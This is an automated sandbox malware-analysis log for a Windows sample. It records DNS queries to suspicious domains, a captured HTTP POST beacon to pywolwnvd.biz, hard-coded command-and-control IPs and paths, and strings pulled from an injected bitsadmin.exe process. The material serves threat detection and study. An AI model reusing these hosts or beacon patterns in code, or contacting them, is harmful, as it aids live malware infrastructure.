                Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
                Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
                Source: global traffic | DNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global traffic | DNS traffic detected: DNS query: www.laohub10.net
                Source: global traffic | DNS traffic detected: DNS query: www.xcvbj.asia
                Source: global traffic | DNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.amayavp.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.vayui.top
                Source: global traffic | DNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global traffic | DNS traffic detected: DNS query: www.t91rl7.pro
                Source: global traffic | DNS traffic detected: DNS query: www.learnwithus.site
                Source: global traffic | DNS traffic detected: DNS query: www.cuthethoi.online
                Source: global traffic | DNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global traffic | DNS traffic detected: DNS query: www.7vh2wy.top
                Source: global traffic | DNS traffic detected: DNS query: www.duwixushx.xyz
                Source: unknown | HTTP traffic detected: POST /gprpendvhdrdevgd HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 802
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:29:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 
3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQpzubfE7qDjNsccnRBOi91m%2F830GH6MVHFluiwayqpVG0TZlnjwobWd9vErmg0KUCPl6zRsX%2Fg9tx%2B697jRxTuy5g0n2RTdT69UejvYG0F77lZu8%2FuGOjRsoUu2Gr31"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ea29cea80dc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W34E5nxdZdtBhfjX%2BmpzPfHvbzTdLG2KayogoGRoOS0%2BwkxY8%2FG%2Bc30IqOSkUhoY3mLrrtZcILceD1k2%2Famu%2BMvBgQFoc%2BkDaie7qxDVyuG154v0Ptzs6EqXJ%2B2i7bs0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017eb29c0c43be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OY16Brr0AgkwysVM%2BDM%2FBWfwLR3vSZem4EL4kHPhJaaLtz803TxVr4fjOTky6g2QgAo8W8M992RgaGh3i8ia9AsE70ctgq%2BC%2F3qTUHZBVScLW9VUqL3aLikHAhnxP9zf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ec27d2b0f8f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4%2B09MgFYcWAG5J8mNztaSHuhAS%2BUXSaIHMNKNC3fLXjktZ%2BS5aLCQtf78CZeb6Ze5ZnlEcUJ9eGpRmA6SWwfYH76NOyUHQt4CSoI%2F%2BTDYUKw3oQf2tofayg9wGQbRkc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ed26b616a55-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:22 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQJUFn2ysBWSq%2FkbYxs9KHa05nO%2Fhqtq5JuaY7%2BG1YqK%2FFw8x%2BtrmHEViHoNM2Xo067RpJbE5ZoWSljrDizrFfaEtCDQAtJfy0i6z6rJ%2BgthntL0loS8KykX%2B0SfK%2B6giIL4GqCZwwI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ef5b9192394-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:25 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWxO7Sd32UzVCZ2kFvXHtmYu8vBvniSi%2B%2F8iSkx0pjlqBTgs6fXJ8dpelLXn2X5VpyIm56XsR2THPQwulnhKWtpFGiteuarT5NqgEepPMpZwXnzykEE1LIDk5nqg09DXM818gU9Phys%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f05ab61334e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1964&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:28 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2F287T8cH1w00yYo3ZmhBPc30vknL7YQRDptOjLxPbAeS%2FkzqTzg7d32sZPQcYffsicCkkE%2Bu8h9SyTpFBRzvnMVuDGfcFf4X%2Fezl3V8FUmD6x2QCcDo4KwrZqEu%2F11Mo9XRDUUmpJo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f158ef042ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAzwjkMM9rm2er2wRcJjgkkLF7Kh2HMqNKClCBm7gmxZBG6R%2BBrezs0qbOvf%2BYZDVCDXgG%2FthxSbLOnP%2BKRF3oTE3%2BMAmtkgzp5Dt1EHCD%2BK0y3mvpsuFKdqsh21ikgQdmTGQ3Wquo4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f256cfac35e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at 
www.rgenerousrs.store Port 80</address></body></html>0
                Source: 1SxKeB4u0c.exe, 1SxKeB4u0c.exe, 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/:
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/rosecbcswnrlukq
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/rosecbcswnrlukq2524.400
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/rosecbcswnrlukqt
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107:80/rosecbcswnrlukqp
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/L
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/U
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454333051.0000000000A48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pywolwnvd.biz/
                Source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000007.00000002.3901034912.0000000006970000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3899231858.00000000049CC000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.000000000385C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.learnwithus.site
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000007.00000002.3899231858.0000000004516000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.00000000033A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003439000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000007.00000003.1867178987.000000000842C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00474164
